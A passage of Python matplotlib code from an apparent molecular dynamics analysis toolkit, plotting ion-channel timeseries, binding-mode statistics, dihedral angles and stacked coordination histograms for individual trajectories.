ion_timeseries[0] is the time values array, but any index would suffice. for traj_id in alloxygen_ts[0][0].keys(): # Color cycle should be initialized very early. mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] # Initialize the figure and compute the number of rows that will # be needed in the figure to capture all the data. fig = plt.figure() gs = gridspec.GridSpec(2, 1, height_ratios=[4,1]) ax1 = plt.subplot(gs[0]) # Prepare a list of binary values and use it to compute how many # are above the occupancy population cutoff. num_plots = len(alloxygen_ts) for row_id, oxygens in enumerate(alloxygen_ts): # Since it's only 1 column of a known number of plots, # add it to the existing figure increasingly lower. # Plot 1 - Ion Timeseries colors = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] for color_id, atom_id in enumerate(sorted(oxygens[0][traj_id].keys())): atom_ts_x = oxygens[1][traj_id][atom_id][::int(data_skip)] atom_ts_y = oxygens[0][traj_id][atom_id][::int(data_skip)] atom_ts_x_scale = [time_conv*pos for pos in atom_ts_x] atom_ts_y_flip = [-10*pos for pos in atom_ts_y] ax1.scatter(atom_ts_x_scale, atom_ts_y_flip, s=0.5, color=colors[color_id]) ax1.set_ylabel("Axial position (nm)") #ax1.set_ylim([-8, 12]) ax1.set_ylim([-5, 7]) #ax1.set_yticks([x/1.0 for x in range(-8,13,2)]) ax1.set_yticks([x/1.0 for x in range(-5,8,1)]) ax1.set_xlim([-5,max_length+5]) ax1.set_xticks(range(0, int(50*round(max_length/50)), 50)) ax1.yaxis.set_major_locator(MultipleLocator(2)) ax1.yaxis.set_minor_locator(MultipleLocator(1)) ax1.xaxis.set_major_locator(MultipleLocator(50)) ax1.xaxis.set_minor_locator(MultipleLocator(25)) ax1.set_axisbelow(True) ax1.yaxis.grid(True,'minor') ax1.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax1.xaxis.grid(True,'minor') ax1.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') plt.setp(ax1.get_xticklabels(), visible=False) ax2 = plt.subplot(gs[1], sharex=ax1) for color_id, atom_id in enumerate(sorted(sf_ts[0][traj_id].keys())): atom_ts_x = sf_ts[1][traj_id][atom_id][::int(data_skip)] atom_ts_y = sf_ts[0][traj_id][atom_id][::int(data_skip)] atom_ts_x_scale = [time_conv*pos for pos in atom_ts_x] # Awkwardly, the units for these files are incorrect and should # be fixed. They are in Ang already. atom_ts_y_flip = [-1*pos for pos in atom_ts_y] ax2.scatter(atom_ts_x_scale, atom_ts_y_flip, s=0.5, color=colors[color_id]) ax2.set_ylabel("C.O.M. Dev. (Ang)") ax2.set_xlabel("Time (ns)") ax2.set_ylim([-5, 5]) ax1.set_xlim([-5,max_length+5]) ax1.set_xticks(range(0, int(50*round(max_length/50)), 50)) ax2.set_yticks([x/1.0 for x in range(-5,6,2)]) ax2.yaxis.set_major_locator(MultipleLocator(1.0)) ax2.yaxis.set_minor_locator(MultipleLocator(0.5)) ax2.yaxis.grid(True,'minor') ax2.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax2.xaxis.grid(True,'minor') ax2.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') plt.subplots_adjust(hspace = 0.1, wspace = 0.02, left = 0.1, bottom = 0.08, right = 0.95, top = 0.93) plt.suptitle(plot_title+" - Traj "+str(traj_id)) if prefix != None: plt.savefig(prefix+"_"+str(traj_id)+".pdf") else: plt.show() plt.close() return True # Just a little helper method to attach labels def autolabel(rects, ax): # attach some text labels for rect in rects: height = rect.get_height() ax.text(rect.get_x()+rect.get_width()/2., 1.05*height, '%d'% int(100*height), ha='center', va='bottom') # This prints each binding mode and the mean occupancy of each of them # across the dataset. Future support will be for multiple atom species. def plot_mode_statistics(mode_counts, sf_col, selectivityf_code, prefix=None, plot_title="Binding Mode Statistics"): num_plots = len(mode_counts) # Compute all the binding modes and turn them into strings all_binding_modes = product("01",repeat=len(sf_col)) all_binding_strs = ["".join(mode) for mode in all_binding_modes] all_binding_chrstrs = [] colors = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] for binding_str in all_binding_strs: temp_str = [] temp_bool = True for coord_index, coord_res in enumerate(binding_str): if int(coord_res) > 0: temp_bool=False temp_str.append(selectivityf_code[coord_index]) if temp_bool: temp_str.append("N/A") all_binding_chrstrs.append("".join(temp_str)) fig = plt.figure() ax = fig.add_subplot(1,1,1) width = 0.35 for ion_num, ion_species in enumerate(mode_counts): data_mean_y = ion_species[0]["MEAN"] data_mean_x = ion_species[1]["MEAN"] data_stderr = ion_species[0]["STDERR"] rects = ax.bar(array(data_mean_x)+width*ion_num, data_mean_y, width, color=colors[ion_num], yerr=data_stderr) autolabel(rects, ax) ax.set_xticklabels( tuple(all_binding_chrstrs) ) plt.subplots_adjust(hspace = 0.1, wspace = 0.02, left = 0.1, bottom = 0.08, right = 0.95, top = 0.93) plt.suptitle(plot_title+" - Mean Vals") if prefix != None: plt.savefig(prefix+".pdf") else: plt.show() plt.close() # This plots a stacked timeseries of dihedral values over time. Useful # for correlating with the oxygen timeseries above. def plot_dihedral_timeseries(dihe_ts, time_conv=0.02, prefix=None, plot_title="Dihedral Timeseries", max_length=500, data_skip=10): colors = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] # This iterates over all the trajectory id's that you computed data for. # ion_timeseries[0] is the time values array, but any index would suffice. for traj_id in dihe_ts[0].keys(): # Initialize the figure and compute the number of rows that will # be needed in the figure to capture all the data. fig = plt.figure() # This should be 4 in the general case, not exactly sure though... #num_plots = len(dihe_ts[0][0][0]) num_plots = 4 for color_id, res_id in enumerate(sorted(dihe_ts[0][traj_id].keys())): ax = fig.add_subplot(num_plots,1,res_id+1) atom_ts_x = dihe_ts[1][traj_id][res_id][::int(data_skip)] atom_ts_x_scale = array([time_conv*pos for pos in atom_ts_x]) atom_ts_y = dihe_ts[0][traj_id][res_id][::int(data_skip)] ax.scatter(atom_ts_x_scale, atom_ts_y, s=0.5, color=colors[color_id]) ax.set_ylim([0, 360]) ax.set_xlim([-5,max_length+5]) ax.set_xticks(range(0, int(50*round(max_length/50)), 50)) ax.yaxis.set_major_locator(MultipleLocator(60.0)) ax.yaxis.set_minor_locator(MultipleLocator(30.0)) ax.yaxis.grid(True,'minor') ax.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax.xaxis.grid(True,'minor') ax.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax.set_ylabel("Chain "+str(color_id+1)+ " Angle") plt.setp(ax.get_xticklabels(), visible=False) plt.setp(ax.get_xticklabels(), visible=True) ax.set_xlabel("Time (ns)") plt.subplots_adjust(hspace = 0.1, wspace = 0.02, left = 0.1, bottom = 0.08, right = 0.95, top = 0.93) plt.suptitle(plot_title+" - Traj "+str(traj_id)) if prefix != None: plt.savefig(prefix+"_"+str(traj_id)+".pdf") else: plt.show() plt.close() return True # This plots a stacked timeseries of trajectory properties in the main column # and histograms of this data in a second column. Sorry for the god-awful # number of arguments... def plot_sf_w_2res_timeseries(channel_occ, channel_counts, dunking_ts, dunking_counts, ion_ts_1st, ion_histo_1st, ion_ts_2nd, ion_histo_2nd, ion_ts_both, ion_histo_both, ion_ts_e_1st, ion_histo_e_1st, ion_ts_l_1st, ion_histo_l_1st, ion_ts_e_2nd, ion_histo_e_2nd, ion_ts_l_2nd, ion_histo_l_2nd, ion_ts_e_both, ion_histo_e_both, ion_ts_l_both, ion_histo_l_both, ion_ts_r, ion_histo_r, time_conv=0.02, prefix=None, plot_title="Stacked Timeseries", max_coord=4, max_length=500, data_skip=10, hist_scale=0.4, ion_types_ts=None, coord_cols_map=["E177","L176"]): # This iterates over all the trajectory id's that you computed data for. # ion_timeseries[0] is the time values array, but any index would suffice. for traj_id in ion_ts_1st[0].keys(): fig = plt.figure() # The grid is a 2 column figure, with 2 + 6 rows. gs = gridspec.GridSpec(9, 2, width_ratios=[4,1], height_ratios=[4,1,1,1,1,1,1,1,2]) mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] # Here we initialize all our subplots on the grid defined above. ax1 = plt.subplot(gs[0]) ax2 = plt.subplot(gs[1], sharey = ax1) ax3 = plt.subplot(gs[2], sharex = ax1) ax4 = plt.subplot(gs[3], sharey = ax3, sharex = ax2) ax5 = plt.subplot(gs[4], sharex = ax1) ax6 = plt.subplot(gs[5], sharey = ax5, sharex = ax2) ax7 = plt.subplot(gs[6], sharex = ax1) ax8 = plt.subplot(gs[7], sharey = ax5, sharex = ax2) ax9 = plt.subplot(gs[8], sharex = ax1) ax10 = plt.subplot(gs[9], sharey = ax5, sharex = ax2) ax11 = plt.subplot(gs[10], sharex = ax1) ax12 = plt.subplot(gs[11], sharey = ax5, sharex = ax2) ax13 = plt.subplot(gs[12], sharex = ax1) ax14 = plt.subplot(gs[13], sharey = ax5, sharex = ax2) ax15 = plt.subplot(gs[14], sharex = ax1) ax16 = plt.subplot(gs[15], sharey = ax5, sharex = ax2) ax17 = plt.subplot(gs[16], sharex = ax1) ax18 = plt.subplot(gs[17], sharey = ax17, sharex = ax2) # Many axis are removed. plt.setp(ax1.get_xticklabels(), visible=False) plt.setp(ax2.get_xticklabels(), visible=False) plt.setp(ax2.get_yticklabels(), visible=False) plt.setp(ax3.get_xticklabels(), visible=False) plt.setp(ax4.get_yticklabels(), visible=False) plt.setp(ax4.get_xticklabels(), visible=False) plt.setp(ax5.get_xticklabels(), visible=False) plt.setp(ax6.get_yticklabels(), visible=False) plt.setp(ax6.get_xticklabels(), visible=False) plt.setp(ax7.get_xticklabels(), visible=False) plt.setp(ax8.get_yticklabels(), visible=False) plt.setp(ax8.get_xticklabels(), visible=False) plt.setp(ax9.get_xticklabels(), visible=False) plt.setp(ax10.get_yticklabels(), visible=False) plt.setp(ax10.get_xticklabels(), visible=False) plt.setp(ax11.get_xticklabels(), visible=False) plt.setp(ax12.get_yticklabels(), visible=False) plt.setp(ax12.get_xticklabels(), visible=False) plt.setp(ax13.get_xticklabels(), visible=False) plt.setp(ax14.get_yticklabels(), visible=False) plt.setp(ax14.get_xticklabels(), visible=False) plt.setp(ax15.get_xticklabels(), visible=False) plt.setp(ax16.get_yticklabels(), visible=False) plt.setp(ax16.get_xticklabels(), visible=False) plt.setp(ax18.get_xticklabels(), visible=False) plt.setp(ax18.get_yticklabels(), visible=False) # Plot 1 - Ion Timeseries colors = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] for color_id, ion_id in enumerate(sorted(ion_ts_1st[0][traj_id].keys(), reverse=False)): ion_ts_x = ion_ts_1st[1][traj_id][ion_id][::int(data_skip/2)] ion_ts_y = ion_ts_1st[0][traj_id][ion_id][::int(data_skip/2)] ion_ts_x_scale = array([time_conv*pos for pos in ion_ts_x]) ion_ts_y_flip = array([-1*pos for pos in ion_ts_y]) # If ion types are passed into this array then we make a mask # of all the ions with type "1" as opposed to "0", and then # use that to extract all the points to replot them with a different # color. if ion_types_ts != None: mask_of_old_ions = array(ion_types_ts[0][traj_id][ion_id][::int(data_skip/2)])==0 mask_of_new_ions = array(ion_types_ts[0][traj_id][ion_id][::int(data_skip/2)])==1 ax1.scatter(ion_ts_x_scale[mask_of_old_ions], ion_ts_y_flip[mask_of_old_ions], s=1, color=colors[color_id]) ax1.scatter(ion_ts_x_scale[mask_of_new_ions], ion_ts_y_flip[mask_of_new_ions], marker='^', s=1, color=colors[color_id]) else: ax1.scatter(ion_ts_x_scale, ion_ts_y_flip, s=1, color=colors[color_id]) # Plot 2 - Ion Position Histogram for vals, ion_z in zip(ion_histo_1st[0][traj_id], ion_histo_1st[1][traj_id]): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] diff = (ion_z[1]-ion_z[0])/2.0 ion_z_shifted = [-1*(ion-diff) for ion in ion_z[1:]] vals_scaled = [val/10.0 for val in vals] ax2.plot(vals_scaled, ion_z_shifted) # Plot 3 - Dunking Counts dunking_ts_x = dunking_ts[1][traj_id][::10] dunking_ts_x_scale = [time_conv*pos for pos in dunking_ts_x] dunking_ts_y = dunking_ts[0][traj_id][::10] ax3.plot(dunking_ts_x_scale, dunking_ts_y) # Plot 4 - Channel Occupancy Histogram channel_occ_hist_x = dunking_counts[1][traj_id] channel_occ_hist_y = dunking_counts[0][traj_id] ax4.barh(channel_occ_hist_x, channel_occ_hist_y, align='center') # Plot 5 - E Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_1st[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_e_1st[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_e_1st[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax5.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 6 - Coordination Histogram #mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] left = 0 for color_id, hist_data in enumerate(zip(ion_histo_e_1st[0][traj_id], ion_histo_e_1st[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax6.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 7 - L Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_1st[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_l_1st[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_l_1st[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax7.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 8 - Coordination Histogram #mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] left = 0 for color_id, hist_data in enumerate(zip(ion_histo_l_1st[0][traj_id], ion_histo_l_1st[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax8.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 9 - E Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_2nd[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_e_2nd[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_e_2nd[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax9.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 6 - Coordination Histogram #mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] left = 0 for color_id, hist_data in enumerate(zip(ion_histo_e_2nd[0][traj_id], ion_histo_e_2nd[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax10.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 11 - L Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_2nd[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_l_2nd[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_l_2nd[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax11.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 6 - Coordination Histogram #mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] left = 0 for color_id, hist_data in enumerate(zip(ion_histo_l_2nd[0][traj_id], ion_histo_l_2nd[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax12.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 13 - E Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_both[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_e_both[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_e_both[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax13.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 14 - Coordination Histogram #mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] left = 0 for color_id, hist_data in enumerate(zip(ion_histo_e_both[0][traj_id], ion_histo_e_both[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax14.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 15 - L Coordination Timeseries Per Atom for ion_id in sorted(ion_ts_both[0][traj_id].keys(), reverse=False): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] ion_ts_x = ion_ts_l_both[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_l_both[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax15.plot(ion_ts_x_scale, ion_ts_y_flip) # Plot 16 - Coordination Histogram #mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] left = 0 for color_id, hist_data in enumerate(zip(ion_histo_l_both[0][traj_id], ion_histo_l_both[1][traj_id])): vals_scaled = array([val*hist_scale for val in hist_data[0]]) labels_scaled = array(hist_data[1][1:])-1 ax16.barh(labels_scaled, vals_scaled, align='center', color=colors[color_id], left=left) left += vals_scaled # Plot 17 - Ion R Timeseries colors = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] for color_id, ion_id in enumerate(sorted(ion_ts_r[0][traj_id].keys(), reverse=False)): ion_ts_x = ion_ts_r[1][traj_id][ion_id][::data_skip] ion_ts_y = ion_ts_r[0][traj_id][ion_id][::data_skip] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [1*pos for pos in ion_ts_y] ax17.scatter(ion_ts_x_scale, ion_ts_y_flip, s=1, color=colors[color_id]) # Plot 18 - Ion R Position Histogram for vals, ion_z in zip(ion_histo_r[0][traj_id], ion_histo_r[1][traj_id]): mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] diff = (ion_z[1]-ion_z[0])/2.0 ion_z_shifted = [1*(ion-diff) for ion in ion_z[1:]] vals_scaled = [val/20.0 for val in vals] ax18.plot(vals_scaled, ion_z_shifted) ax1.set_ylabel("Axial position (nm)") ax1.set_ylim([-1.1, 1.0]) ax1.set_yticks([x/10.0 for x in range(-10,10,2)]) ax1.set_xlim([-5,max_length+5]) ax1.set_xticks(range(0, int(50*round(max_length/50)), 50)) ax1.yaxis.set_major_locator(MultipleLocator(0.2)) ax1.yaxis.set_minor_locator(MultipleLocator(0.1)) ax1.xaxis.set_major_locator(MultipleLocator(50)) ax1.xaxis.set_minor_locator(MultipleLocator(25)) ax1.set_axisbelow(True) ax1.yaxis.grid(True,'minor') ax1.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax1.xaxis.grid(True,'minor') ax1.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax2.grid(True) ax2.set_xlim([0,1.0]) ax2.set_xticks([x/10.0 for x in range(0,11,2)]) ax3.set_ylabel("Dunk") ax3.set_yticks(range(0,max_coord+1,2)) ax3.set_ylim([-0.5,max_coord+0.5]) ax3.yaxis.set_major_locator(MultipleLocator(2)) ax3.yaxis.set_minor_locator(MultipleLocator(1)) ax3.xaxis.set_major_locator(MultipleLocator(50)) ax3.xaxis.set_minor_locator(MultipleLocator(25)) ax3.set_axisbelow(True) ax3.yaxis.grid(True,'minor') ax3.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax3.xaxis.grid(True,'minor') ax3.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax4.grid(True) ax5.set_yticks(range(0,max_coord+1,2)) ax5.set_ylim([-0.5,max_coord+0.5]) ax5.yaxis.set_major_locator(MultipleLocator(2)) ax5.yaxis.set_minor_locator(MultipleLocator(1)) ax5.xaxis.set_major_locator(MultipleLocator(50)) ax5.xaxis.set_minor_locator(MultipleLocator(25)) ax5.set_axisbelow(True) ax5.yaxis.grid(True,'minor') ax5.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax5.xaxis.grid(True,'minor') ax5.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax5.set_ylabel(coord_cols_map[0]+"\n1st") ax6.grid(True) ax7.set_yticks(range(0,max_coord+1,2)) ax7.set_ylim([-0.5,max_coord+0.5]) ax7.yaxis.set_major_locator(MultipleLocator(2)) ax7.yaxis.set_minor_locator(MultipleLocator(1)) ax7.xaxis.set_major_locator(MultipleLocator(50)) ax7.xaxis.set_minor_locator(MultipleLocator(25)) ax7.set_axisbelow(True) ax7.yaxis.grid(True,'minor') ax7.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax7.xaxis.grid(True,'minor') ax7.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax7.set_ylabel(coord_cols_map[1]+"\n1st") ax8.grid(True) ax9.set_yticks(range(0,max_coord+1,2)) ax9.set_ylim([-0.5,max_coord+0.5]) ax9.yaxis.set_major_locator(MultipleLocator(2)) ax9.yaxis.set_minor_locator(MultipleLocator(1)) ax9.xaxis.set_major_locator(MultipleLocator(50)) ax9.xaxis.set_minor_locator(MultipleLocator(25)) ax9.set_axisbelow(True) ax9.yaxis.grid(True,'minor') ax9.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax9.xaxis.grid(True,'minor') ax9.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax9.set_ylabel(coord_cols_map[0]+"\n2nd") ax10.grid(True) ax11.set_yticks(range(0,max_coord+1,2)) ax11.set_ylim([-0.5,max_coord+0.5]) ax11.yaxis.set_major_locator(MultipleLocator(2)) ax11.yaxis.set_minor_locator(MultipleLocator(1)) ax11.xaxis.set_major_locator(MultipleLocator(50)) ax11.xaxis.set_minor_locator(MultipleLocator(25)) ax11.set_axisbelow(True) ax11.yaxis.grid(True,'minor') ax11.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax11.xaxis.grid(True,'minor') ax11.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax11.set_ylabel(coord_cols_map[1]+"\n2nd") ax11.set_xlabel("Time (ns)") ax12.grid(True) ax13.set_yticks(range(0,max_coord+1,2)) ax13.set_ylim([-0.5,max_coord+0.5]) ax13.yaxis.set_major_locator(MultipleLocator(2)) ax13.yaxis.set_minor_locator(MultipleLocator(1)) ax13.xaxis.set_major_locator(MultipleLocator(50)) ax13.xaxis.set_minor_locator(MultipleLocator(25)) ax13.set_axisbelow(True) ax13.yaxis.grid(True,'minor') ax13.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax13.xaxis.grid(True,'minor') ax13.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax13.set_ylabel(coord_cols_map[0]+"\nBoth") ax14.grid(True) ax15.set_yticks(range(0,max_coord+1,2)) ax15.set_ylim([-0.5,max_coord+0.5]) ax15.set_ylabel(coord_cols_map[1]+"\nBoth") ax15.yaxis.set_major_locator(MultipleLocator(2)) ax15.yaxis.set_minor_locator(MultipleLocator(1)) ax15.xaxis.set_major_locator(MultipleLocator(50)) ax15.xaxis.set_minor_locator(MultipleLocator(25)) ax15.set_axisbelow(True) ax15.yaxis.grid(True,'minor') ax15.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax15.xaxis.grid(True,'minor') ax15.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax16.grid(True) ax17.set_ylabel("R (nm)") ax17.yaxis.set_major_locator(MultipleLocator(0.2)) ax17.yaxis.set_minor_locator(MultipleLocator(0.1)) ax17.xaxis.set_major_locator(MultipleLocator(50)) ax17.xaxis.set_minor_locator(MultipleLocator(25)) ax17.set_axisbelow(True) ax17.yaxis.grid(True,'minor') ax17.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax17.xaxis.grid(True,'minor') ax17.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax17.set_ylim([0, 0.6]) ax17.set_yticks([x/100.0 for x in range(0,50,20)]) ax17.set_xlabel("Time (ns)") ax18.grid(True) ax18.xaxis.set_major_formatter(FormatStrFormatter('%.1f')) plt.subplots_adjust(hspace = 0.1, wspace = 0.02, left = 0.1, bottom = 0.08, right = 0.95, top = 0.93) plt.suptitle(plot_title+" - Traj "+str(traj_id)) if prefix != None: plt.savefig(prefix+"_"+str(traj_id)+".pdf") else: plt.show() plt.close() return True # This plots a stacked timeseries of trajectory properties in the main column # and histograms of this data in a second column. Sorry for the god-awful # number of arguments... def plot_sf_w_3res_timeseries(channel_occ, channel_counts, ion_ts_1st, ion_histo_1st, ion_ts_2nd, ion_histo_2nd, ion_ts_both, ion_histo_both, ion_ts_d1_1st, ion_histo_d1_1st, ion_ts_d2_1st, ion_histo_d2_1st, ion_ts_d3_1st, ion_histo_d3_1st, ion_ts_d1_2nd, ion_histo_d1_2nd, ion_ts_d2_2nd, ion_histo_d2_2nd, ion_ts_d3_2nd, ion_histo_d3_2nd, ion_ts_d1_both, ion_histo_d1_both, ion_ts_d2_both, ion_histo_d2_both, ion_ts_d3_both, ion_histo_d3_both, ion_ts_r, ion_histo_r, time_conv=0.02, prefix=None, plot_title="Stacked Timeseries", max_coord=5, max_length=500, data_skip=10, hist_scale=0.4): # This iterates over all the trajectory id's that you computed data for. # ion_timeseries[0] is the time values array, but any index would suffice. for traj_id in ion_ts_1st[0].keys(): fig = plt.figure() # The grid is a 2 column figure, with 2 + 6 rows. gs = gridspec.GridSpec(11, 2, width_ratios=[4,1], height_ratios=[4,1,1,1,1,1,1,1,1,1,2]) mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] # Here we initialize all our subplots on the grid defined above. ax1 = plt.subplot(gs[0]) ax2 = plt.subplot(gs[1], sharey = ax1) ax3 = plt.subplot(gs[2], sharex = ax1) ax4 = plt.subplot(gs[3], sharey = ax3, sharex = ax2) ax5 = plt.subplot(gs[4], sharex = ax1) ax6 = plt.subplot(gs[5], sharey = ax3, sharex = ax2) ax7 = plt.subplot(gs[6], sharex = ax1) ax8 = plt.subplot(gs[7], sharey = ax3, sharex = ax2) ax9 = plt.subplot(gs[8], sharex = ax1) ax10 = plt.subplot(gs[9], sharey = ax3, sharex = ax2) ax11 = plt.subplot(gs[10], sharex = ax1) ax12 = plt.subplot(gs[11], sharey = ax3, sharex = ax2) ax13 = plt.subplot(gs[12], sharex = ax1) ax14 = plt.subplot(gs[13], sharey = ax3, sharex = ax2) ax15 = plt.subplot(gs[14], sharex = ax1) ax16 = plt.subplot(gs[15], sharey = ax3, sharex = ax2) ax17 = plt.subplot(gs[16], sharex = ax1) ax18 = plt.subplot(gs[17], sharey = ax3, sharex = ax2) ax19 = plt.subplot(gs[18], sharex = ax1) ax20 = plt.subplot(gs[19], sharey = ax3, sharex = ax2) ax21 = plt.subplot(gs[20], sharex = ax1) ax22 = plt.subplot(gs[21], sharey = ax21, sharex = ax2) # Many axis are removed. plt.setp(ax1.get_xticklabels(), visible=False) plt.setp(ax2.get_xticklabels(), visible=False) plt.setp(ax2.get_yticklabels(), visible=False) plt.setp(ax3.get_xticklabels(), visible=False) plt.setp(ax4.get_yticklabels(), visible=False) plt.setp(ax4.get_xticklabels(), visible=False) plt.setp(ax5.get_xticklabels(), visible=False) plt.setp(ax6.get_yticklabels(), visible=False) plt.setp(ax6.get_xticklabels(), visible=False) plt.setp(ax7.get_xticklabels(), visible=False) plt.setp(ax8.get_yticklabels(), visible=False) plt.setp(ax8.get_xticklabels(), visible=False) plt.setp(ax9.get_xticklabels(), visible=False) plt.setp(ax10.get_yticklabels(), visible=False) plt.setp(ax10.get_xticklabels(), visible=False) plt.setp(ax11.get_xticklabels(), visible=False) plt.setp(ax12.get_yticklabels(), visible=False) plt.setp(ax12.get_xticklabels(), visible=False) plt.setp(ax13.get_xticklabels(), visible=False) plt.setp(ax14.get_yticklabels(), visible=False) plt.setp(ax14.get_xticklabels(), visible=False) plt.setp(ax15.get_xticklabels(), visible=False) plt.setp(ax16.get_yticklabels(), visible=False) plt.setp(ax16.get_xticklabels(), visible=False) plt.setp(ax18.get_xticklabels(), visible=False) plt.setp(ax18.get_yticklabels(), visible=False) plt.setp(ax19.get_xticklabels(), visible=False) plt.setp(ax20.get_xticklabels(), visible=False) plt.setp(ax20.get_yticklabels(), visible=False) plt.setp(ax22.get_xticklabels(), visible=False) plt.setp(ax22.get_yticklabels(), visible=False) # Plot 1 - Ion Timeseries colors = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] for color_id, ion_id in enumerate(sorted(ion_ts_1st[0][traj_id].keys(), reverse=False)): ion_ts_x = ion_ts_1st[1][traj_id][ion_id][::int(data_skip/2)] ion_ts_y = ion_ts_1st[0][traj_id][ion_id][::int(data_skip/2)] ion_ts_x_scale = [time_conv*pos for pos in ion_ts_x] ion_ts_y_flip = [-1*pos for pos in ion_ts_y] ax1.scatter(ion_ts_x_scale, 